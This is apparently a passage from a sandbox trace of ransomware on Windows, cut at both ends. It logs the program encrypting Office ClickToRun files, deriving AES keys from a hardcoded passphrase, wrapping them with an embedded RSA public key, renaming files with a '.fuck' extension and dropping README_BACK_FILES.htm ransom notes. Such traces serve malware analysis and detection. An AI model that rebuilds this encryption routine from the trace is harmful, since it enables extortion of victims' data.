pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.746] CryptEncrypt (in: hKey=0x282e0b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28817c0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28817c0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.747] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28817c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.747] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.747] CryptEncrypt (in: hKey=0x282e478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.747] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.747] CloseHandle (hObject=0xffffffff) returned 1 [0238.747] CloseHandle (hObject=0xffffffff) returned 1 [0238.747] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml"), bFailIfExists=0) returned 0 [0238.747] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x0) returned 0 [0238.748] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml.gsg")) returned 0 [0238.748] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml.fuck")) returned 0 [0238.749] CryptDestroyHash (hHash=0x282dfb8) returned 1 [0238.749] CryptDestroyKey (hKey=0x282e478) returned 1 [0238.749] CryptReleaseContext (hProv=0x2880c98, dwFlags=0x0) returned 1 [0238.749] FindNextFileA (in: hFindFile=0x282e178, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.749] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.749] GetLastError () returned 0x5 [0238.749] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash")) returned 0x20 [0238.749] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash", dwFileAttributes=0x80) returned 0 [0238.750] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.750] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.751] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.gsg", dwFileAttributes=0x2) returned 0 [0238.751] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x287fb98) returned 1 [0238.754] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.754] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.754] CryptHashData (hHash=0x282dfb8, pbData=0x276dd38, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.754] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282dfb8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e1b8) returned 1 [0238.754] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.754] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.754] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2880c10) returned 1 [0238.755] CryptImportPublicKeyInfo (in: hCryptProv=0x2880c10, dwCertEncodingType=0x1, pInfo=0x286b748*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b778*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b780*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e078) returned 1 [0238.755] CryptEncrypt (in: hKey=0x282e078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.755] CryptEncrypt (in: hKey=0x282e078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880e30*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2880e30*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.755] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2880e30, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.755] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.755] CryptEncrypt (in: hKey=0x282e1b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.755] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.756] CloseHandle (hObject=0xffffffff) returned 1 [0238.756] CloseHandle (hObject=0xffffffff) returned 1 [0238.756] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash"), bFailIfExists=0) returned 0 [0238.756] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash", dwFileAttributes=0x0) returned 0 [0238.757] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash.gsg")) returned 0 [0238.757] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash.fuck")) returned 0 [0238.758] CryptDestroyHash (hHash=0x282dfb8) returned 1 [0238.758] CryptDestroyKey (hKey=0x282e1b8) returned 1 [0238.758] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.758] FindNextFileA (in: hFindFile=0x282e178, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.758] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.758] GetLastError () returned 0x5 [0238.758] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat")) returned 0x20 [0238.758] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x80) returned 0 [0238.759] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.759] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.759] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0238.760] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2880f40) returned 1 [0238.763] CryptCreateHash (in: hProv=0x2880f40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.763] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.763] CryptHashData (hHash=0x282dfb8, pbData=0x276d9a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.763] CryptDeriveKey (in: hProv=0x2880f40, Algid=0x6610, hBaseData=0x282dfb8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e338) returned 1 [0238.763] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.763] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.763] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2881628) returned 1 [0238.763] CryptImportPublicKeyInfo (in: hCryptProv=0x2881628, dwCertEncodingType=0x1, pInfo=0x286b8e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b918*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b920*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e1b8) returned 1 [0238.763] CryptEncrypt (in: hKey=0x282e1b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.763] CryptEncrypt (in: hKey=0x282e1b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881958*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2881958*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.764] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881958, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.764] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.764] CryptEncrypt (in: hKey=0x282e338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.764] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.764] CloseHandle (hObject=0xffffffff) returned 1 [0238.764] CloseHandle (hObject=0xffffffff) returned 1 [0238.764] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat"), bFailIfExists=0) returned 0 [0238.764] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x0) returned 0 [0238.765] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat.gsg")) returned 0 [0238.765] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat.fuck")) returned 0 [0238.766] CryptDestroyHash (hHash=0x282dfb8) returned 1 [0238.766] CryptDestroyKey (hKey=0x282e338) returned 1 [0238.766] CryptReleaseContext (hProv=0x2880f40, dwFlags=0x0) returned 1 [0238.766] FindNextFileA (in: hFindFile=0x282e178, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0238.766] FindClose (in: hFindFile=0x282e178 | out: hFindFile=0x282e178) returned 1 [0238.766] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\readme_back_files.htm")) returned 0xffffffff [0238.766] AreFileApisANSI () returned 1 [0238.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0238.767] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.767] GetLastError () returned 0x5 [0238.767] GetLastError () returned 0x5 [0238.767] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.767] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x282e0f8 [0238.768] FindNextFileA (in: hFindFile=0x282e0f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.768] FindNextFileA (in: hFindFile=0x282e0f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.768] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.768] GetLastError () returned 0x5 [0238.768] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml")) returned 0x20 [0238.769] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x80) returned 0 [0238.769] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.770] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.770] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.770] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2880c98) returned 1 [0238.773] CryptCreateHash (in: hProv=0x2880c98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.773] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.773] CryptHashData (hHash=0x282e178, pbData=0x276dab8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.773] CryptDeriveKey (in: hProv=0x2880c98, Algid=0x6610, hBaseData=0x282e178, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e338) returned 1 [0238.773] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.773] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.773] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2880f40) returned 1 [0238.774] CryptImportPublicKeyInfo (in: hCryptProv=0x2880f40, dwCertEncodingType=0x1, pInfo=0x286c378*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c3a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c3b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e1f8) returned 1 [0238.774] CryptEncrypt (in: hKey=0x282e1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.774] CryptEncrypt (in: hKey=0x282e1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28816b0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28816b0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.774] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28816b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.774] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.774] CryptEncrypt (in: hKey=0x282e338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.774] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: 